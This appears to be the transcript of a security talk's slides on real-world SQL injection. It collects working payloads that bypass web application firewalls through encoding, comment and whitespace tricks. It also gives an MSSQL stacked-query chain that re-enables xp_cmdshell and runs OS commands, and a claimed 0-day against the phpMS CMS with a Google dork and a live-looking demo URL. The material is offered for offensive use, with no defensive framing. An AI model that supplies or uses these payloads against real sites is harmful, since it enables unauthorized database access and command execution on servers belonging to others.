sql injections with real life scenarious
TRANSCRIPT
SQL INJECTIONS WITH REAL LIFE SCENARIOUS
By Francis Alexander
WHO AM I?
• Got Listed at ebay and Microsoft security Researchers List
• Worked as free lance security researcher for tech2.in.com and in.com
• Found SQLi vulnerabilities at kerala enterance portal website
• http://tech2.in.com/news/general/updated-serious-vulnerability-affects-kerala-common-entrance-exams-portal/369982
• Basically the InfoSec Researcher Guy
AGENDA
Strictly waf based and Real Life Based Scenarious
MsSql Stack Based Queries(thought it as a good addon)
A PHP-MS 0-DAY
SQLI AN INTROFirst among the OWASP TOP 10 vulnerabilitiesUsed for gaining access to sql database and hence the b0x
Mainly of 5 types Union based Error based X-path based Blind and Time based Double Query based
PENTESTING SQLI IN REAL WORLDSo whats the catch here!!!Pentesting real life scenarious is much difficult than ever
Sqli has been patched and firewalls, IDS and IPS installed everywhere
Exploiting Sqli has been difficult and tools has disappointed to !
WHAT HAS KEPT US DULL Ofcourse Failure of Sqlmap !!!Failure of Havij which by the way is always a failure :p
IDS , IPS and other firewall familyApache security modules mod_sec,htmlentities,mysql_escape,magic_quotes and all my dear appsec modules
ADVANCED WAF BYPASSING TECHNIQUESWhat are they !!?Well we need to overcome the situation that has come rather than site and lament over it
Here will focusing on the real life scenarious where the tools fail and much of our human hard work comes in
BYPASSING FILTERSPreg_match is a comparer statement used in phpMainly deployed by small scale waf’sPoorly coded ones the easier an example
SQLI USING STORED PARAMETERSUsed when “select” + any case letters are blocked 'select'+'(A-Za-z)‘So any letter after select gets filtered outSolutionMysql has an option called stored variable procedure“@” is a sign that can be used as a prefix, that denotes stored procedure, function parameter names, and variables names.
So how do we do it?Union select 1,2,3 - - = 403 ForbiddenSo It changes to and (@:=version()) union select 1,@,3- - = bypassed
WHERE HAS THE ID=? DISAPPEARED So whats the Catch here Most of us love the dork inurl:php?id= site:blah.com So what has happened most admins have changed the id= parameters to within the url and making the tools go wreckless and n00bs go mad
An example would be the usuall way was site.com/index.php?id= ,now they have gone on and changed to site.com/index-goods-12.html
An example site that has no point of injection at the first sight
Ex: http://www.cal***.com/Preservatif-Callvin-Preservatif-Je-suis-prete,884.html
A FEW POINTS TO PONDERUsual commenting style should be followed here ie the “- -” other wise other forms like %23(#) and /* could cause the browser to misinterpret the statement as a comment hence commenting out the rest and not letting it read the .html part
In most cases encountered these type of injections, there are white spaces which often cause a havoc and nightmare for scanners
MESSING UP WITH WHITE SPACES Well dealing with white spaces depends on different scenarios
U could use the traditional commenting style like id=3/**/union/**/select 1,2,3 or Well the problem is /**/ might be filtered in some cases So we use the ()which is the same as executing the query id=(2)union(select(1),2,3) NB:During html based injections it is better to use the paranthesis
SQLI IN HTML TAGS Based on Error 1222 Came across CTF’s where the answer had to be in normal union based .
Most tools fails here since the vulnerable column is being parsed in between the html tags.
Usually union statements are being provided here but the columns do not get displayed.
So what do we do ? Plse don’t say we look over the source because ur not gonna find anything at the first shot
We do this by changing the traditional union select 1,2,3 to union select 1111,2222,3333
This helps us to search in the source but still nt available on screen.
If u could like to display it on screen u could useconcat or group_concat functions and using html inside them
Use hex of html if the quotes are blocked due to magic quotes
Here we could see the version on closing the “</title>” tag since the vulnerable column was being displayed within the title block
BYPASSING SOME COMMON ERRORS
Bypassing errors 400/403/404/406 //convert(group_concat(schema_name) using ascii) from information_schema.schemata - -
C-style Commenting : /*!Union*/+/*!Select*///apart from the original source commenting the ! Executes the command
Character Encoding :Bypasses filters like 400 %55nion/**/%53elect
Sub queries : Union (select 1,2,3) //Where most WAF’s fail out
id=-1+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3%0A#a // # is comment but the %0A bypasses with the new line so the
statements gets executed
Bypassing Error 1064 Usually related with blocking of white spaces id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
// the queries are supplied in parenthesis so as to forbid the use of white spaces “/**/ “Commenting also possible
Bypassing Error 500 and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+x,x--+// WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data.Give a large amount of data allows our code executing
INTRO TO MSSQL STACKED QUERIESStacked queries mainly available in mssql and postgresql servers
Underlying process is simple if chmdshell options are enable then u are in
Stacked Queries Support is Checked on Server using 'WAITFOR DELAY hour:min:sec’
For ex:EXEC MASTER..xp_cmdshell 'PING 127.0.0.1 -n 6'-- - would check whether cmdshell is enabled or nt depending upon time lag.
RE-ENABLING XP.CMDSHELL IN CASE ITS DEAD? http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'show
advanced options', 1-- -
http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
http://www.site.com/security.asp?vulnID=123; EXEC sp_configure 'xp_cmdshell', 1-- -
http://www.site.com/security.asp?vulnID=123; RECONFIGURE-- -
THE SITE CHECKED FOR PRIMARY ERRORS USING THE TRADITIONAL UNION SELECT STATEMENTS
Just to prove that still this exists a Real Life – demo
QUERY PARTYhttp://www.site.com/security.asp?vulnID=123;; CREATE TABLE funkyfresh (data varchar(8000));--
// Creates the table funkyfresh http://www.site.com/security.asp?vulnID=123;; DECLARE @funky varchar(4000); SET @funky=0x77686f616d69; INSERT INTO funkyfresh EXEC MASTER..xp_cmdshell @funky;-- -
// WE declare a variable @funky and store it with hex equi. Of the codeNOTE: 0x77686f616d69 => 'whoami‘
/!*AND*/ 5151=CONVERT(INT,(CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32))),1,100) FROM funkyfresh WHERE ISNULL(data,CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) FROM funkyfresh ORDER BY data) ORDER BY data)+CHAR(91)+CHAR(83)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(93)))
// Creadits to Bernardo's original write-up from BlackHat
//The reason I took it although a bit complicated works for no reason
seamlessly Read the temp table to get the results and you need to make sure you deal with same data type when you do...
PHP-MS EXPLOIT 0-DAY 0-day by me phpMS - a free CMS (content management system), Designed for rapid development and support of web-projects of any complexity.
Features CMS phpMS: Easy to install; Multi-level menus; Arbitrary arrangement of blocks; Simple module development; Access rights
#GOOGLE DORK: INTEXT:COPYRIGHT©2005 PHPMSDemo http://http://www.rusug.ru/index.php?tree=8&mode=view&id=-7+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6--
#By default 6 columns in most cases seen so could use this as default in sites discovered
#Finding the admin page of this makes it very easy to exploit # Default admin page is admin.php :-)Eg : http://www.site.com/admin.php :)
ANY QUESTIONS ?
References Couple of Blackhat talks and papers kaotickreations.blogspot.in (my blog) http://websec.wordpress.com/tag/sql-filter-evasion/